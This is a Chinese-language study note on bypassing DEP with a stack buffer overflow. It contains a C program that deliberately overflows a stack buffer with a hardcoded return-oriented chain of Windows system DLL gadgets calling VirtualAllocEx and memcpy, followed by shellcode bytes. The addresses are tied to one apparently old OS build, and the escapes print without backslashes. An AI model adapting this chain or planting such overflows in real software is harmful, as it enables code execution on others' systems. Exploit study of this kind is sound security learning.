此文章只是笔记。
下面的实验还是通过 memcpy 进行的，不能直接利用。
LPVOID VirtualAlloc(
    LPVOID lpAddress,        // 要分配的内存区域的地址 0x00030000
    DWORD  dwSize,           // 分配的大小 0xff
    DWORD  flAllocationType, // 分配的类型 0x1000 MEM_COMMIT
    DWORD  flProtect         // 该内存的初始保护属性 0x40
);
函数成功时返回所申请内存的起始地址；申请失败则返回 NULL。
构造完参数后，直接跳向 VirtualAllocEx。
// GS_Virtual.cpp : Defines the entry point for the console application.
//
// Experiment notes (see the surrounding post): test() copies `shellcode`
// into an undersized stack buffer on purpose.  Per the author's inline
// comments, `shellcode` is laid out as a NOP sled, a chain of absolute
// return addresses into system DLLs (VirtualAllocEx, pop/ret gadgets,
// memcpy) with their arguments, and finally the payload bytes.
//
// NOTE(review): every address below is an absolute pointer into one
// specific build of shell32.dll / kernel32.dll / ntdll.dll / the CRT;
// nothing in this file derives them, so the listing only describes that
// exact OS image (the 0x7C8xxxxx kernel32 range suggests a Windows XP-era
// image -- unverified).  Under ASLR those constants no longer point at the
// named code, and a /GS-compiled test() fails its cookie check before the
// overwritten return address is used.
//
// NOTE(review): as printed, the string escapes carry no backslashes
// ("x90" instead of "\x90"), presumably lost in extraction.  Taken
// literally each is three ASCII characters, so the byte counts in the
// comments (176, 450, 168) refer to the intended "\x" form.
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>

// Stack image that test() writes over `tt`: 180 sled bytes (176-byte
// buffer + 4), then the return-address / argument chain, then the payload.
char shellcode[]=
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90"
    /* Address=7D72E0E5  Message=Found: PUSH ESP POP EBP RET 4 at 0x7d72e0e5
       Module: C:\WINDOWS\system32\shell32.dll */
    "xe5xe0x72x7d"   // fix up EBP; retn 4
    "xf4x9ax80x7C"   // 7C809AF4  E8 09000000  call kernel32.VirtualAllocEx
    "x90x90x90x90"
    "xFFxFFxFFxFF"   // -1: current process
    "x00x00x03x00"   // requested region start address
    "xFFx00x00x00"   // requested region size
    "x00x10x00x00"   // allocation type
    "x40x00x00x00"   // access type of the requested region
    "x90x90x90x90"
    /* 7C80997D  58  pop eax   (kernel32.dll)
       7C80997E  C3  retn */
    "x7dx99x80x7c"   // pop eax; retn
    "x90x90x90x90"
    "x90x90x90x90"
    "x90x90x90x90"
    "x90x90x90x90"
    /* Address=7C94D75D  Message=Found: POP EDI POP ESI RETN at 0x7c94d75d
       Module: C:\WINDOWS\system32\ntdll.dll */
    "x5dxd7x94x7C"   // pop; pop; retn
    "xe5xe0x72x7d"   // fix up EBP; retn 4
    /* Address=7D74CFDA  Message=Found: POP EBX RETN at 0x7d74cfda
       Module: C:\WINDOWS\system32\shell32.dll */
    "xdaxcfx74x7d"
    "x00x00x03x00"   // executable region address: where execution transfers
    "x00x00x03x00"   // executable region address: copy destination
    /* 77EBC6C6  54  push esp */
    "xc6xc6xebx77"   // push esp; jmp eax -- also the original shellcode start address
    "xFFx00x00x00"   // shellcode length
    "x75x6fxc1x77"   // memcpy  77C16F75  8B75 0C  mov esi,dword ptr ss:[ebp+0xC]
    "x00x00x03x00"   // any readable address
    "x00x00x03x00"   // any readable address
    "x90x90x90x90"
    // Payload bytes; the original carries no annotation for them.
    "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
    "x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
    "x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
    "x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
    "xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
    "x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
    "xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
    "xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
    "x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
    "x53"
    "x68x64x61x30x23"
    "x68x23x50x61x6E"
    "x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8";  // 168 -- author's count, presumably the payload length (unverified)

// Deliberately overflows a 176-byte stack buffer with 450 bytes of
// `shellcode`.  This is the defect under study, not an oversight: the copy
// runs past `tt` into the saved frame.  In production code the fix is a
// bounded copy (sizeof tt); here the overrun is the experiment itself.
void test() {
    char tt[176];
    memcpy(tt, shellcode, 450);
}

// Loads shell32.dll -- presumably so the module the gadget comments point
// into is mapped before test() runs -- then triggers the overflow.
// hInst and temp are never read; temp likely only shapes the stack
// (unverified).
int main() {
    HINSTANCE hInst = LoadLibrary("shell32.dll");
    char temp[200];
    test();
    return 0;
}
尽量寻找系统 DLL 上的代码，不要用程序自身的代码；当然也有例外。实验得真理。